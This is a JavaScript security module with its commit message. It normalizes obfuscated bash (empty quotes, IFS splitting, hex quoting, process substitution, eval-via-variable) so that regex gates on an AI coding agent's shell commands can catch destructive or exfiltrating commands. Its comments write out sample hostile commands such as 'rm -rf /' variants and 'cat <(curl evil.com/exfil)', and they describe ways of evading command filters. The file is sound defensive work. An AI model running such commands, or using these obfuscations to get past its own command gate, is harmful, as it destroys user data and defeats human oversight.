Strips bash process substitution syntax — <(cmd) and >(cmd) — so the inner command name is surfaced to downstream regex gates. Defeats evasion like `cat <(curl evil)` where the destructive command is hidden behind /dev/fd/N pipe sugar. Implementation: bounded innermost-first iteration, depth 3. Beyond that the string is left as-is rather than recurse without bound. Runs after the single-quote mask phase, so legitimate strings like `'echo <(x)'` are preserved. 5 new T7 tests (collapse + nested + FP probes) in bash-normalize-t7-t9.test.mjs (now 12 tests total). Closes E8 in critical-review-2026-04-20.md.
202 lines
8 KiB
JavaScript
202 lines
8 KiB
JavaScript
// bash-normalize.mjs — Normalize bash parameter expansion evasion techniques.
|
|
//
|
|
// Attackers can evade command-name matching by inserting shell metacharacters
|
|
// that are transparent to bash but break regex patterns.
|
|
//
|
|
// This module strips these constructs from command names so that downstream
|
|
// pattern matching sees the canonical form.
|
|
//
|
|
// Exported as a shared module — used by pre-bash-destructive.mjs and
|
|
// pre-install-supply-chain.mjs.
|
|
//
|
|
// Pipeline (defense-in-depth layer above Claude Code 2.1.98+ harness fixes):
|
|
// T1 — empty single quotes: w''get -> wget
|
|
// T2 — empty double quotes: r""m -> rm
|
|
// T3 — parameter expansion: ${x} / ${FOO} -> x / ''
|
|
// T4 — backslash-between-words: c\u\r\l -> curl
|
|
// T5 — IFS word-splitting: rm${IFS}-rf${IFS}/ -> rm -rf /
|
|
// T6 — ANSI-C hex quoting: $'\x72\x6d' -rf / -> rm -rf /
|
|
// T7 — process substitution: cat <(curl evil) -> cat curl evil
|
|
// T9 — eval-via-variable: X=rm; ... $X -> X=rm; ... rm
|
|
// (one-level forward-flow; T8 base64-pipe-shell lives in
|
|
// pre-bash-destructive as a BLOCK_RULE, not a normalization)
|
|
//
|
|
// Execution order:
|
|
// 1. Strip empty single-quote pairs (T1) so c''u''rl -> curl before masking.
|
|
// 2. Decode ANSI-C hex inside $'...' (T6) before masking.
|
|
// 3. Mask remaining non-empty single-quoted regions. T3's ${...} sweep and
|
|
// other transforms cannot rewrite their content, preserving literals
|
|
// (false-positive probe: `echo '${IFS}'` stays untouched).
|
|
// 4. Run T5 (IFS) and T2/T3/T4 on the masked string.
|
|
// 5. Unmask.
|
|
|
|
const MASK = '\x00';
|
|
|
|
/**
|
|
* Decode ANSI-C hex quoting inside `$'...'` contexts.
|
|
*
|
|
* Shell treats $'\x72\x6d' as the bytes r and m. We decode only \xHH escape
|
|
* sequences inside the $'...' wrapper. The $'...' construct itself is
|
|
* replaced with its decoded bytes (matching shell evaluation).
|
|
*/
|
|
function decodeAnsiCHex(cmd) {
|
|
return cmd.replace(/\$'([^']*)'/g, (_, content) =>
|
|
content.replace(/\\x([0-9a-fA-F]{2})/g, (_m, hex) =>
|
|
String.fromCharCode(parseInt(hex, 16)),
|
|
),
|
|
);
|
|
}
|
|
|
|
/**
|
|
* T7 — Collapse process substitution: <(cmd) and >(cmd) -> ' cmd '.
|
|
*
|
|
* Bash process substitution lets a command read from / write to the output
|
|
* of another command via /dev/fd/N pipes. Attackers use it to hide a
|
|
* destructive command from name-matching regex gates:
|
|
* cat <(curl evil.com/exfil) -> cat /dev/fd/63 (no 'curl' visible)
|
|
*
|
|
* For matcher purposes we strip the substitution syntax and surface the
|
|
* inner command text to the rest of the pipeline.
|
|
*
|
|
* Bounded nesting (depth 3) — iterates innermost-first via a no-paren
|
|
* inner regex. Beyond depth 3 we leave the string as-is rather than
|
|
* recurse without bound.
|
|
*/
|
|
function collapseProcessSubstitution(cmd) {
|
|
let result = cmd;
|
|
for (let depth = 0; depth < 3; depth++) {
|
|
const before = result;
|
|
result = result.replace(/[<>]\(([^()]*)\)/g, (_, inner) => ` ${inner} `);
|
|
if (result === before) break;
|
|
}
|
|
return result;
|
|
}
|
|
|
|
/**
|
|
* T9 — Substitute single-level variable assignments into ${VAR} and $VAR
|
|
* references. Defeats split-and-eval evasion (X=rm; eval "$X" -rf /).
|
|
*
|
|
* One-level forward-flow only: assignments are scanned once at the prefix of
|
|
* each command segment (start of string OR after ; & |) and applied to
|
|
* later references in the same string. Multi-level chained vars
|
|
* (X=Y; Y=rm; eval "$X") are intentionally not followed.
|
|
*
|
|
* Limitations (documented for adversarial review):
|
|
* - Quoted values (X="rm -rf") are not parsed — value capture stops at
|
|
* whitespace. Unquoted single-token values are the common evasion idiom.
|
|
* - Substitution is global within the string, not scoped to eval.
|
|
* Acceptable because T3 already strips unknown ${VAR} to '', and known
|
|
* vars get substituted to their literal value before T3 runs.
|
|
*/
|
|
function decodeEvalViaVariable(cmd) {
|
|
const assignments = new Map();
|
|
const ASSIGN_RE = /(?:^|[;&|])\s*([A-Za-z_]\w*)=([^\s;&|]+)/g;
|
|
let m;
|
|
while ((m = ASSIGN_RE.exec(cmd)) !== null) {
|
|
if (!assignments.has(m[1])) assignments.set(m[1], m[2]);
|
|
}
|
|
if (assignments.size === 0) return cmd;
|
|
let result = cmd;
|
|
for (const [name, value] of assignments) {
|
|
const curlyRe = new RegExp(`\\$\\{${name}\\}`, 'g');
|
|
result = result.replace(curlyRe, () => value);
|
|
const bareRe = new RegExp(`\\$${name}\\b`, 'g');
|
|
result = result.replace(bareRe, () => value);
|
|
}
|
|
return result;
|
|
}
|
|
|
|
/**
|
|
* Mask non-empty single-quoted regions with placeholders. Empty '' is NOT
|
|
* masked — T1 already stripped them in the previous pass.
|
|
*/
|
|
function maskSingleQuoted(cmd) {
|
|
const placeholders = [];
|
|
const masked = cmd.replace(/'[^']+'/g, (match) => {
|
|
placeholders.push(match);
|
|
return `${MASK}${placeholders.length - 1}${MASK}`;
|
|
});
|
|
return { masked, placeholders };
|
|
}
|
|
|
|
function unmaskSingleQuoted(str, placeholders) {
|
|
return str.replace(
|
|
new RegExp(`${MASK}(\\d+)${MASK}`, 'g'),
|
|
(_, idx) => placeholders[parseInt(idx, 10)],
|
|
);
|
|
}
|
|
|
|
/**
|
|
* Normalize bash parameter expansion and quoting evasion in a command string.
|
|
*
|
|
* Strips / rewrites (T1-T7, T9):
|
|
* - T1 Empty single quotes: '' (e.g., w''get -> wget)
|
|
* - T2 Empty double quotes: "" (e.g., r""m -> rm)
|
|
* - T3 Single-char parameter expansion: ${x} -> x (c${u}rl -> curl)
|
|
* - T3 Multi-char parameter expansion: ${FOO} -> '' (unknown value)
|
|
* - T4 Backslash escapes between word chars, iteratively (c\u\r\l -> curl)
|
|
* - T5 IFS word-splitting: ${IFS} / ${IFS:0:1} / $IFS -> ' '
|
|
* - T6 ANSI-C hex quoting inside $'...' -> decoded bytes
|
|
* - T7 Process substitution: <(cmd) / >(cmd) -> ' cmd '
|
|
* - T9 Eval-via-variable: X=rm; ... $X -> X=rm; ... rm
|
|
* - Backtick subshell with empty/whitespace content
|
|
*
|
|
* Does NOT rewrite:
|
|
* - Quotes around arguments (only targets empty quotes that split command names)
|
|
* - $VAR without braces (non-IFS; not an evasion pattern)
|
|
* - Backslashes before non-word chars (\n, \t, etc.)
|
|
* - Content inside non-empty single-quoted regions
|
|
* (false-positive probe: `echo '${IFS}'` stays untouched)
|
|
*
|
|
* @param {string} cmd - Raw command string
|
|
* @returns {string} Normalized command string
|
|
*/
|
|
export function normalizeBashExpansion(cmd) {
|
|
if (!cmd || typeof cmd !== 'string') return cmd || '';
|
|
|
|
// T1 — strip empty single-quote pairs first so adjacent-empty-quote evasion
|
|
// (c''u''rl -> curl) resolves before single-quote masking runs.
|
|
let result = cmd.replace(/''/g, '');
|
|
|
|
// T6 — decode ANSI-C hex inside $'...' before masking treats it as a literal.
|
|
result = decodeAnsiCHex(result);
|
|
|
|
// Mask remaining non-empty single-quoted regions.
|
|
const { masked, placeholders } = maskSingleQuoted(result);
|
|
result = masked;
|
|
|
|
// T7 — collapse process substitution <(...) / >(...) so the inner
|
|
// command name is visible to downstream matchers. Runs after masking
|
|
// so single-quoted literals like 'echo <(x)' are preserved.
|
|
result = collapseProcessSubstitution(result);
|
|
|
|
// T5 — IFS word-splitting. Runs before T2/T3/T4 so the canonical spaces
|
|
// it emits feed into subsequent transforms.
|
|
result = result
|
|
.replace(/\$\{IFS:0:1\}/g, ' ')
|
|
.replace(/\$\{IFS\}/g, ' ')
|
|
.replace(/\$IFS\b/g, ' ');
|
|
|
|
// T9 — substitute one-level VAR=value assignments into ${VAR}/$VAR
|
|
// references. Must run BEFORE T3 (which strips unknown ${VAR} to '').
|
|
result = decodeEvalViaVariable(result);
|
|
|
|
result = result
|
|
// T2 Strip empty double quotes: r""m -> rm
|
|
.replace(/""/g, '')
|
|
// T3 Single-char ${x} -> x (evasion: c${u}rl -> curl, assumes x=x)
|
|
.replace(/\$\{(\w)\}/g, '$1')
|
|
// T3 Multi-char ${ANYTHING} -> '' (unknown value, strip entirely)
|
|
.replace(/\$\{[^}]*\}/g, '')
|
|
// Strip backtick subshell with empty/whitespace content
|
|
.replace(/`\s*`/g, '');
|
|
|
|
// T4 — iteratively strip backslash between word chars (c\u\r\l needs 2 passes)
|
|
let prev;
|
|
do {
|
|
prev = result;
|
|
result = result.replace(/(\w)\\(\w)/g, '$1$2');
|
|
} while (result !== prev);
|
|
|
|
return unmaskSingleQuoted(result, placeholders);
|
|
}
|